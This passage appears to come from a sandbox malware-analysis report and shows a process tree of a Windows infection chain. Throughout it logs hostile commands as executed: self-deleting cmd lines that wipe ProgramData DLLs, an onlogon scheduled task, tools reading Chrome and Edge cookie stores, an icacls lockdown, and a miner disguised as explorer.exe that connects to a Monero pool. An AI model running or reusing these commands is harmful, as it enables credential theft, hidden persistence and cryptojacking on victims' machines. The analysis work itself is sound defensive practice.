                                                                                                                    • C:\Users\Admin\Documents\nT03IAi8KrFYxC74nGWpAPro.exe
                                                                                                                      "C:\Users\Admin\Documents\nT03IAi8KrFYxC74nGWpAPro.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4452
                                                                                                                    • C:\Users\Admin\Documents\mb11iq9iX9_fkdVPRixeRsys.exe
                                                                                                                      "C:\Users\Admin\Documents\mb11iq9iX9_fkdVPRixeRsys.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4564
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1282483047.exe"
                                                                                                                        7⤵
                                                                                                                          PID:4992
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1282483047.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1282483047.exe"
                                                                                                                            8⤵
                                                                                                                              PID:4020
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 1282483047.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1282483047.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                9⤵
                                                                                                                                  PID:5456
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /im 1282483047.exe /f
                                                                                                                                    10⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:5644
                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                    timeout /t 6
                                                                                                                                    10⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:5184
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1297020361.exe"
                                                                                                                              7⤵
                                                                                                                                PID:5736
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1297020361.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1297020361.exe"
                                                                                                                                  8⤵
                                                                                                                                    PID:5836
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "mb11iq9iX9_fkdVPRixeRsys.exe" /f & erase "C:\Users\Admin\Documents\mb11iq9iX9_fkdVPRixeRsys.exe" & exit
                                                                                                                                  7⤵
                                                                                                                                    PID:5916
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /im "mb11iq9iX9_fkdVPRixeRsys.exe" /f
                                                                                                                                      8⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:3992
                                                                                                                                • C:\Users\Admin\Documents\tRmfoUpORScMjvDQKq4BT7fi.exe
                                                                                                                                  "C:\Users\Admin\Documents\tRmfoUpORScMjvDQKq4BT7fi.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:4372
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 668
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5112
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 652
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5192
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 672
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5300
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 684
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5364
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1120
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5864
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1188
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5316
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1200
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:5288
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "tRmfoUpORScMjvDQKq4BT7fi.exe" /f & erase "C:\Users\Admin\Documents\tRmfoUpORScMjvDQKq4BT7fi.exe" & exit
                                                                                                                                      7⤵
                                                                                                                                        PID:4636
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im "tRmfoUpORScMjvDQKq4BT7fi.exe" /f
                                                                                                                                          8⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:6140
                                                                                                                                    • C:\Users\Admin\Documents\bidpGThS2fW_DGX0_oh46yfG.exe
                                                                                                                                      "C:\Users\Admin\Documents\bidpGThS2fW_DGX0_oh46yfG.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4920
                                                                                                                                      • C:\Users\Admin\Documents\bidpGThS2fW_DGX0_oh46yfG.exe
                                                                                                                                        "C:\Users\Admin\Documents\bidpGThS2fW_DGX0_oh46yfG.exe" -a
                                                                                                                                        7⤵
                                                                                                                                          PID:5468
                                                                                                                                      • C:\Users\Admin\Documents\npBRBpaRPwgSyMzyVg9jLi0l.exe
                                                                                                                                        "C:\Users\Admin\Documents\npBRBpaRPwgSyMzyVg9jLi0l.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:4952
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im npBRBpaRPwgSyMzyVg9jLi0l.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\npBRBpaRPwgSyMzyVg9jLi0l.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                          7⤵
                                                                                                                                            PID:5228
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /im npBRBpaRPwgSyMzyVg9jLi0l.exe /f
                                                                                                                                              8⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:1096
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 6
                                                                                                                                              8⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:4808
                                                                                                                                        • C:\Users\Admin\Documents\UGMh762iEP4vpzzeDFMb6zZe.exe
                                                                                                                                          "C:\Users\Admin\Documents\UGMh762iEP4vpzzeDFMb6zZe.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:4184
                                                                                                                                          • C:\Users\Admin\Documents\UGMh762iEP4vpzzeDFMb6zZe.exe
                                                                                                                                            "C:\Users\Admin\Documents\UGMh762iEP4vpzzeDFMb6zZe.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:5608
                                                                                                                                          • C:\Users\Admin\Documents\O2GaT0ap49D4AB2QN9pduGRs.exe
                                                                                                                                            "C:\Users\Admin\Documents\O2GaT0ap49D4AB2QN9pduGRs.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:4484
                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5536
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                  8⤵
                                                                                                                                                    PID:5244
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                    8⤵
                                                                                                                                                      PID:4836
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                      8⤵
                                                                                                                                                        PID:5084
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        8⤵
                                                                                                                                                          PID:4620
                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                        7⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:5512
                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:5456
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            8⤵
                                                                                                                                                              PID:4736
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4420
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4424
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:4572
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:5352
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:6040
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:6132
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5468
                                                                                                                                                                    • C:\Users\Admin\Documents\7rwptWHbmXtUhuA7luM6HY1V.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\7rwptWHbmXtUhuA7luM6HY1V.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:896
                                                                                                                                                                    • C:\Users\Admin\Documents\k1raDWgYhUdZopIuGCaZMmGL.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\k1raDWgYhUdZopIuGCaZMmGL.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:2852
                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:5776
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                            PID:5908
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\services64.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:5124
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:3752
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
                                                                                                                                                                                9⤵
                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                PID:4072
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:5552
                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM --pass=30-60-miner --cpu-max-threads-hint=30 --cinit-idle-wait=5 --cinit-idle-cpu=60
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:1000
                                                                                                                                                                            • C:\Users\Admin\Documents\1IHn56GKVx2vw9t7dFWmqcWS.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\1IHn56GKVx2vw9t7dFWmqcWS.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:4356
                                                                                                                                                                              • C:\Users\Admin\Documents\1IHn56GKVx2vw9t7dFWmqcWS.exe
                                                                                                                                                                                C:\Users\Admin\Documents\1IHn56GKVx2vw9t7dFWmqcWS.exe
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:2172
                                                                                                                                                                            • C:\Users\Admin\Documents\ZauRqc5ASHBtiBIvH3eO4GeV.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\ZauRqc5ASHBtiBIvH3eO4GeV.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:4660
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:5144
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:5584
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:340
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:5132
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:3492
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\sonia_6.exe
                                                                                                                                                                                  sonia_6.exe
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:3660
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:2168
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4188
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:940
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:4556
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:1052
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:3320
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCF2E12C4\sonia_4.exe
                                                                                                                                                                                          sonia_4.exe
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:2076
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 424
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Program crash
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:804
                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:1164
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:3708
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:4508
                                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:1500
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2168
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\43FA.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\43FA.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3356
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\43FA.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\43FA.exe
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5420
                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                            icacls "C:\Users\Admin\AppData\Local\0759bb8d-9ec9-4950-b913-fd70653aea63" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                            PID:5992
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\43FA.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\43FA.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4824
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\43FA.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\43FA.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2144
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\29e84e10-5283-4c47-87df-6544b027fe0a\build2.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\29e84e10-5283-4c47-87df-6544b027fe0a\build2.exe"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:5216
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\29e84e10-5283-4c47-87df-6544b027fe0a\build2.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\29e84e10-5283-4c47-87df-6544b027fe0a\build2.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:4960
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\29e84e10-5283-4c47-87df-6544b027fe0a\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:4656
                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                              taskkill /im build2.exe /f
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                              PID:2148
                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                              PID:5804
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5939.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5939.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5520
                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                  PID:4072
                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4440
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7EC3.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7EC3.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4488
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FDD7.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\FDD7.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1528
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D1B.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D1B.exe
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5984
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im D1B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D1B.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:5456
                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                              taskkill /im D1B.exe /f
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                              PID:5740
                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                              PID:4240
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2315.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2315.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:4620
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2901.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2901.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:4972
                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4892
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3BEE.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3BEE.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:4668
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5042.exe
